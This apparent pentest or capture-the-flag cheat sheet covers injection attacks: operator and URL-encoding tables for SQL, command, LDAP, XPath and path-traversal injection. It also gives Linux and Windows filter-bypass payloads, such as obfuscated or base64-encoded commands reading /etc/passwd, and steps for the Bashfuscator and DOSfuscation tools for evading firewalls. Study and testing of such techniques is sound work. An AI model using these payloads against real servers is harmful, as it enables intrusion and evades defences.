Overview

User-controlled input that can lead to queries or code execution on the target server (OS, SQL, XSS, etc.). Front-end and back-end often use different validation, which can create vulnerabilities.

NOTE: Try URL encoding, newlines, tabs instead of spaces, and other encoding when characters are blocked.

Injection Types

Injection Type	Operators (Raw)	Operators (URL Encoded)
SQL Injection	`'` `,` `;` `--` `/* */`	`%27` `%2C` `%3B` `%2D%2D` `%2F%2A%20%2A%2F`
Command Injection	`;` `&&`	`%3B` `%26%26`
LDAP Injection	`*` `(` `)` `&` `\|`	`%2A` `%28` `%29` `%26` `%7C`
XPath Injection	`'` `or` `and` `not` `substring` `concat` `count`	`%27` `or` `and` `not` `substring` `concat` `count`
OS Command Injection	`;` `&` `\|`	`%3B` `%26` `%7C`
Code Injection	`'` `;` `--` `/* */` `$()` `${}` `#{}` `%{}` `^`	`%27` `%3B` `%2D%2D` `%2F%2A%20%2A%2F` `%24%28%29` `%24%7B%7D` `%23%7B%7D` `%25%7B%7D` `%5E`
Directory/Path Traversal	`../` `..\\`	`%2E%2E%2F` `%2E%2E%5C` `%00`
Object Injection	`;` `&` `\|`	`%3B` `%26` `%7C`
XQuery Injection	`'` `;` `--` `/* */`	`%27` `%3B` `%2D%2D` `%2F%2A%20%2A%2F`
Shellcode Injection	`\x` `\u`	`%5Cx` `%5Cu` `%u` `%n`
Header Injection	`\n` `\r\n` `\t`	`%0A` `%0D%0A` `%09`
Space		`%20`

Workarounds

When a crucial character is blocked, reference it from the environment (variable) or use alternate syntax. Use man ascii (Linux) or Get-ChildItem Env: (PowerShell) to find usable characters.

Linux

Curly-bracket expansion and character shifting: `\` is 92 (ASCII), `[` is 91.

Blocked	Bypass (example)
whitespace	`${IFS}`
`/`	`${PATH:0:1}` or `$(tr '!-}' '"-~'<<<[)`
`;`	`${LS_COLORS:10:1}`

Commands: Mix quotes into the name: w"h"o"am"i, who$@ami, w\ho\am\i.
Case: $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") or $(a="WhOaMi";printf %s "${a,,}").
Reversals: $(rev<<<'imaohw').
Encoded: echo -n 'cat /etc/passwd | grep 33' | base64 → bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==).
Use <<< instead of | when pipes are blocked.

Windows

Blocked	Bypass (example)
whitespace	space in `%VAR%` or `
`/`	`%HOMEPATH:~6,-11%` or `$env:HOMEPATH[0]`
`;`	`%COMSPEC:~4,1%` or newline in variable

Commands: Insert ^: who^ami. Try case variants: WHOAMI, wHoaMi.
Reversals: iex "$('imaohw'[-1..-20] -join '')".
Encoded (Unicode Base64): [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) → iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))".

Tools

Useful against basic WAFs and static regex in web-based command injection. Modern EDRs often detect these via telemetry.

Linux: Bashfuscator

https://github.com/Bashfuscator/Bashfuscator

Generates heavily obfuscated bash. Tune down for web use (small payloads). Evades WAFs by breaking strings into arrays and reconstructing at runtime.

# 1. Install (requires specific setuptools)
git clone https://github.com/Bashfuscator/Bashfuscator && cd Bashfuscator
pip3 install setuptools==65
python3 setup.py install --user

# 2. Generate a short payload (-s 1 -t 1 --layers 1)
cd bashfuscator/bin/
./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1

# 3. Test locally before sending
bash -c '<PASTE_OUTPUT>'

Windows: DOSfuscation

https://github.com/danielbohannon/Invoke-DOSfuscation

Interactive PowerShell framework for obfuscating cmd.exe payloads. Uses env var substring extraction (e.g. %TEMP:~-3,-2%) so keywords don’t appear in the HTTP request.

# 1. Install & load
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation

# 2. Interactive: set command then encoding
SET COMMAND type C:\Users\Public\flag.txt
encoding
1